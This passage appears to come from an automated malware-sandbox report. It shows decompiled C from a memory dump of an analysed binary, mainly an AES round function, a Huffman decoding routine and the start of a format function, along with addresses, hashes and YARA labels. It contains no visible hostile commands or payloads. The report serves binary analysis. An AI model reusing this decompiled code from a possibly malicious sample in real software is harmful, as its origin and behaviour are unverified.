							return E00C4EA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
						}
						_t399 =  *(_t432 + 0x60);
						 *(_t432 + 0x1c) = _t399 + 8;
						_t229 =  *(_t432 + 0x70);
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x20) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
							E00C3DEDF(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x44);
							 *(_t432 + 0x68) =  *(0xc75350 + (_t402 & 0x000000ff) * 4) ^  *(0xc75f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0xc75b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x50);
							_t363 =  *(_t432 + 0x68) ^  *(0xc75750 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x68) = _t363;
							 *(_t432 + 0x34) = _t363;
							_t403 =  *(_t432 + 0x48);
							_t368 =  *(0xc75750 + (_t402 & 0x000000ff) * 4) ^  *(0xc75350 + (_t403 & 0x000000ff) * 4) ^  *(0xc75f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0xc75b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							 *(_t432 + 0x70) = _t368;
							 *(_t432 + 0x38) = _t368;
							_t404 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0xc75b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0xc75750 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x10) ^  *(0xc75350 + (_t404 & 0x000000ff) * 4) ^  *(0xc75f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t372;
							 *(_t432 + 0x3c) = _t372;
							 *(_t432 + 0x14) =  *(0xc75f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0xc75b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x14) ^  *(0xc75750 + (_t404 & 0x000000ff) * 4) ^  *(0xc75350 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x14) = _t376;
							 *(_t432 + 0x40) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x68);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x14) = _t309;
							_t430 = _t309;
							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x10);
								 *(_t432 + 0x14) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x70);
								_t416 =  *(0xc75750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xc75b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xc75f50 + (_t356 >> 0x18) * 4) ^  *(0xc75350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
								 *(_t432 + 0x34) = _t416;
								 *(_t432 + 0x70) =  *(0xc75b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xc75f50 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x70) ^  *(0xc75750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xc75350 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x70) = _t388;
								 *(_t432 + 0x38) = _t388;
								_t394 =  *(0xc75f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0xc75750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xc75b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xc75350 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x10) = _t394;
								 *(_t432 + 0x3c) = _t394;
								_t376 =  *(0xc75750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xc75b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xc75f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0xc75350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
								_t135 = _t432 + 0x18;
								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
								 *(_t432 + 0x40) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x24));
							 *(_t432 + 0x68) = _t416;
							_t415 =  *(_t432 + 0x6c);
							 *(_t432 + 0x14) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
							 *(_t432 + 0x6c) = _t253;
							 *(_t432 + 0x44) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0xc74230));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0xc74230));
							_t423 =  *(_t432 + 0x6c);
							 *(_t432 + 0x4c) = _t406;
							 *(_t432 + 0x48) = _t350;
							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0xc74230));
							 *(_t432 + 0x50) = _t378;
							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0xc74230));
							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0xc74230));
							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0xc74230));
							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0xc74230));
							_t170 = (_t406 >> 0x18) + 0xc74230; // 0x54cbe9de
							 *((char*)(_t432 + 0x3b)) =  *_t170;
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0xc74230));
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0xc74230));
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0xc74230));
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0xc74230));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0xc74230));
							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0xc74230));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0xc74230));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0xc74230));
							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
							 *(_t432 + 0x6c) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x54);
								_t426 = _t426 ^  *(_t432 + 0x58);
								_t353 = _t353 ^  *(_t432 + 0x5c);
								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
							}
							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
							_t304 =  *(_t432 + 0x1c);
							 *(_t432 + 0x58) =  *(_t304 - 4);
							 *(_t432 + 0x5c) =  *_t304;
							 *(_t432 + 0x60) = _t304[1];
							_t382 =  *(_t432 + 0x20);
							 *(_t432 + 0x1c) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x6c);
							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x20) = _t359;
							 *(_t432 + 0x6c) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E00C3E3D4(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
				}
				return _t222;
			}











































                                            0x00c3df17
                                            0x00c3df1b
                                            0x00c3df1d
                                            0x00c3df23
                                            0x00c3df29
                                            0x00c3df30
                                            0x00c3df34
                                            0x00c3df4f
                                            0x00c3df58
                                            0x00c3df5d
                                            0x00c3df62
                                            0x00c3e3b9
                                            0x00000000
                                            0x00c3e3c9
                                            0x00c3df68
                                            0x00c3df71
                                            0x00c3df75
                                            0x00c3df79
                                            0x00c3df7b
                                            0x00c3df7f
                                            0x00c3df82
                                            0x00c3df86
                                            0x00c3df86
                                            0x00c3df96
                                            0x00c3dfa3
                                            0x00c3dfa8
                                            0x00c3dfce
                                            0x00c3dfd2
                                            0x00c3dfdd
                                            0x00c3dfe4
                                            0x00c3dfe8
                                            0x00c3dfef
                                            0x00c3e015
                                            0x00c3e021
                                            0x00c3e025
                                            0x00c3e033
                                            0x00c3e03e
                                            0x00c3e055
                                            0x00c3e061
                                            0x00c3e065
                                            0x00c3e07c
                                            0x00c3e091
                                            0x00c3e098
                                            0x00c3e099
                                            0x00c3e09d
                                            0x00c3e0a4
                                            0x00000000
                                            0x00000000
                                            0x00c3e0aa
                                            0x00c3e0b4
                                            0x00c3e0b7
                                            0x00c3e0bb
                                            0x00c3e0bd
                                            0x00c3e0c1
                                            0x00c3e0c6
                                            0x00c3e0c9
                                            0x00c3e0cd
                                            0x00c3e0d3
                                            0x00c3e0d5
                                            0x00c3e0d9
                                            0x00c3e0e8
                                            0x00c3e118
                                            0x00c3e129
                                            0x00c3e13b
                                            0x00c3e157
                                            0x00c3e160
                                            0x00c3e164
                                            0x00c3e19d
                                            0x00c3e1a4
                                            0x00c3e1a8
                                            0x00c3e1d5
                                            0x00c3e1dc
                                            0x00c3e1dc
                                            0x00c3e1e1
                                            0x00c3e1e1
                                            0x00c3e1eb
                                            0x00c3e1ef
                                            0x00c3e1f3
                                            0x00c3e1f7
                                            0x00c3e1fb
                                            0x00c3e1fe
                                            0x00c3e202
                                            0x00c3e206
                                            0x00c3e210
                                            0x00c3e21d
                                            0x00c3e229
                                            0x00c3e230
                                            0x00c3e23a
                                            0x00c3e246
                                            0x00c3e24a
                                            0x00c3e24e
                                            0x00c3e258
                                            0x00c3e261
                                            0x00c3e26b
                                            0x00c3e278
                                            0x00c3e28a
                                            0x00c3e29c
                                            0x00c3e2a5
                                            0x00c3e2ab
                                            0x00c3e2bb
                                            0x00c3e2d0
                                            0x00c3e2e5
                                            0x00c3e2f4
                                            0x00c3e301
                                            0x00c3e30c
                                            0x00c3e315
                                            0x00c3e322
                                            0x00c3e32c
                                            0x00c3e33c
                                            0x00c3e33f
                                            0x00c3e342
                                            0x00c3e349
                                            0x00c3e34d
                                            0x00c3e34f
                                            0x00c3e353
                                            0x00c3e357
                                            0x00c3e35f
                                            0x00c3e35f
                                            0x00c3e369
                                            0x00c3e36d
                                            0x00c3e374
                                            0x00c3e37a
                                            0x00c3e384
                                            0x00c3e388
                                            0x00c3e38c
                                            0x00c3e390
                                            0x00c3e397
                                            0x00c3e39a
                                            0x00c3e39e
                                            0x00c3e3a1
                                            0x00c3e3a3
                                            0x00c3e3a6
                                            0x00c3e3a9
                                            0x00c3e3ad
                                            0x00c3e3ad
                                            0x00000000
                                            0x00c3e3b8
                                            0x00000000
                                            0x00c3df3f
                                            0x00c3e3d1

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c1dda5ac1361a139f6cec5a1a61a488dbbb14ea4c79c92b714fc07a342571957
                                            • Instruction ID: dfd283194b9cfd02a148b461f99e3f5b1eb88aecb547ce55837e4ebdf198abe6
                                            • Opcode Fuzzy Hash: c1dda5ac1361a139f6cec5a1a61a488dbbb14ea4c79c92b714fc07a342571957
                                            • Instruction Fuzzy Hash: F8E147745183808FC308CF29E89096EBBF0BB8A301F89095EF5D987366D375E955CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4364E, Relevance: .3, Instructions: 263COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E00C4364E(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E00C3A4D1(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E00C3A4E8(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00C4E920(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00C3A4D1(_t184, 2);
						do {
							 *(_t201 + 0x14) = E00C3A4E8(_t184) >> 0x0000000c & 0x000000ff;
							E00C3A4D1(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E00C3A4E8(_t184) >> 0x0000000c & 0x000000ff;
							E00C3A4D1(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00C42C88();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E00C3A4ED(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E00C3A4E8(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E00C3A4E8(_t157) >> 0xd) + 3;
													_push(3);
												}
												E00C3A4D1(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E00C3A4E8(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00C3A4E8(_t166) >> 0xd) + 3;
												_push(3);
											}
											E00C3A4D1(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E00C44393(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00C42C88();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00C42C88();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00C42C88();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00C42C88();
							E00C4EA80(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E00C42435(_t185 + 0x98d8, _t178, _t205);
				}
				_t135 = E00C44393(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}





































                                            0x00c4364e
                                            0x00c43655
                                            0x00c4365e
                                            0x00c43666
                                            0x00c43675
                                            0x00c43680
                                            0x00c43687
                                            0x00c4368c
                                            0x00c43691
                                            0x00c436b6
                                            0x00c436b8
                                            0x00c436be
                                            0x00c436c4
                                            0x00c436ca
                                            0x00c436cf
                                            0x00c436de
                                            0x00c436e3
                                            0x00c436e3
                                            0x00c436ea
                                            0x00c436f0
                                            0x00c43701
                                            0x00c43705
                                            0x00c4370a
                                            0x00c4370e
                                            0x00c43711
                                            0x00c4374a
                                            0x00000000
                                            0x00c4374a
                                            0x00c43721
                                            0x00c43724
                                            0x00c43729
                                            0x00c4372b
                                            0x00c43734
                                            0x00c43734
                                            0x00c43737
                                            0x00c43737
                                            0x00c43738
                                            0x00c4373b
                                            0x00000000
                                            0x00000000
                                            0x00c4373d
                                            0x00c43742
                                            0x00c43743
                                            0x00c43745
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c43745
                                            0x00c43747
                                            0x00000000
                                            0x00c43747
                                            0x00c4372d
                                            0x00c4374e
                                            0x00c4374e
                                            0x00c4374f
                                            0x00c4374f
                                            0x00c43754
                                            0x00c43756
                                            0x00c4375e
                                            0x00c43763
                                            0x00c43764
                                            0x00c43769
                                            0x00c43769
                                            0x00c4376b
                                            0x00c43774
                                            0x00c43776
                                            0x00c43787
                                            0x00c43789
                                            0x00c43790
                                            0x00c43796
                                            0x00c4379c
                                            0x00c437a0
                                            0x00c437cd
                                            0x00c437ce
                                            0x00c437cf
                                            0x00c437d3
                                            0x00c437d5
                                            0x00c437f3
                                            0x00c437f6
                                            0x00c43802
                                            0x00c43804
                                            0x00c43808
                                            0x00c4380d
                                            0x00c4381a
                                            0x00c4381c
                                            0x00c4381f
                                            0x00c43821
                                            0x00c43821
                                            0x00c43823
                                            0x00c4382b
                                            0x00c4382b
                                            0x00c4382e
                                            0x00c43845
                                            0x00c43848
                                            0x00c43894
                                            0x00c43896
                                            0x00c438b3
                                            0x00c438b3
                                            0x00c438b6
                                            0x00c43898
                                            0x00c438a2
                                            0x00c438a5
                                            0x00c438a5
                                            0x00c438ba
                                            0x00c438bf
                                            0x00c438bf
                                            0x00c438c0
                                            0x00c438c6
                                            0x00000000
                                            0x00000000
                                            0x00c438c8
                                            0x00c438cd
                                            0x00c438ce
                                            0x00c438d0
                                            0x00000000
                                            0x00000000
                                            0x00c438d2
                                            0x00c438d2
                                            0x00000000
                                            0x00c438d2
                                            0x00000000
                                            0x00c438bf
                                            0x00c4384a
                                            0x00c4384d
                                            0x00c4384f
                                            0x00c4386c
                                            0x00c4386c
                                            0x00c4386f
                                            0x00c43851
                                            0x00c4385b
                                            0x00c4385e
                                            0x00c4385e
                                            0x00c43873
                                            0x00c43878
                                            0x00c4387a
                                            0x00c438f5
                                            0x00c438f5
                                            0x00c43974
                                            0x00000000
                                            0x00c4387c
                                            0x00c4387c
                                            0x00c4387c
                                            0x00c4387d
                                            0x00c43883
                                            0x00000000
                                            0x00000000
                                            0x00c43889
                                            0x00c4388d
                                            0x00c4388e
                                            0x00c43890
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c43892
                                            0x00000000
                                            0x00c4387c
                                            0x00c4387a
                                            0x00c4383b
                                            0x00c4383f
                                            0x00000000
                                            0x00c4383f
                                            0x00c437de
                                            0x00c437de
                                            0x00c437e0
                                            0x00c437e0
                                            0x00c437e2
                                            0x00000000
                                            0x00000000
                                            0x00c437e4
                                            0x00c437e5
                                            0x00c437e8
                                            0x00c437eb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c437ed
                                            0x00c437ef
                                            0x00000000
                                            0x00c437ef
                                            0x00c437a4
                                            0x00c437a7
                                            0x00c437b1
                                            0x00c437b9
                                            0x00c437be
                                            0x00c437c1
                                            0x00000000
                                            0x00c437c1
                                            0x00c4377a
                                            0x00c4377f
                                            0x00c43781
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c438d8
                                            0x00c438d8
                                            0x00c438d8
                                            0x00c438e4
                                            0x00c438e6
                                            0x00c438ed
                                            0x00c438f3
                                            0x00c438f9
                                            0x00c43906
                                            0x00c4390b
                                            0x00c4390c
                                            0x00c43911
                                            0x00c4391b
                                            0x00c43923
                                            0x00c43924
                                            0x00c43929
                                            0x00c43933
                                            0x00c4393b
                                            0x00c4393c
                                            0x00c43941
                                            0x00c4394b
                                            0x00c43953
                                            0x00c43954
                                            0x00c4396a
                                            0x00c43972
                                            0x00000000
                                            0x00c43972
                                            0x00000000
                                            0x00c438f3
                                            0x00c43699
                                            0x00c436a3
                                            0x00c436a4
                                            0x00000000
                                            0x00c436ab
                                            0x00c43668
                                            0x00c4366f
                                            0x00000000
                                            0x00000000
                                            0x00c4397e

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                                            • Instruction ID: 24d8737b83b371af4d4e1ccaff651b0047d41d429035b181f2625c3da9b20575
                                            • Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
                                            • Instruction Fuzzy Hash: 619155B02043899BDB24EF68D995BBEB785BBD0300F10092DF9D7872C2DB74A645D752
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C53EE9, Relevance: .2, Instructions: 237COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E00C53EE9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int* _t103;
				void* _t105;
				signed int _t111;
				unsigned int _t113;
				signed char _t115;
				void* _t123;
				unsigned int _t124;
				void* _t125;
				signed int _t126;
				short _t127;
				void* _t130;
				void* _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				void* _t138;
				void* _t139;

				_t125 = __edi;
				_t52 =  *0xc6d668; // 0x13bcba52
				_v8 = _t52 ^ _t135;
				_t134 = __ecx;
				_t102 = 0;
				_t123 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t105 = 0x58;
				_t138 = _t54 - 0x64;
				if(_t138 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00C5491B(_t134);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t134 + 0x30)) - _t102;
								if( *((intOrPtr*)(_t134 + 0x30)) != _t102) {
									L71:
									_t57 = 1;
									L72:
									return E00C4E203(_t57, _v8 ^ _t135);
								}
								_t124 =  *(_t134 + 0x20);
								_push(_t125);
								_v16 = _t102;
								_t60 = _t124 >> 4;
								_v12 = _t102;
								_t126 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t111 =  *(_t134 + 0x32) & 0x0000ffff;
									__eflags = _t111 - 0x78;
									if(_t111 == 0x78) {
										L48:
										_t62 = _t124 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t111 - 0x61;
											if(_t111 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t127 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t135 + _t102 * 2 - 0xc)) = _t127;
													__eflags = _t111 - _t65;
													if(_t111 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
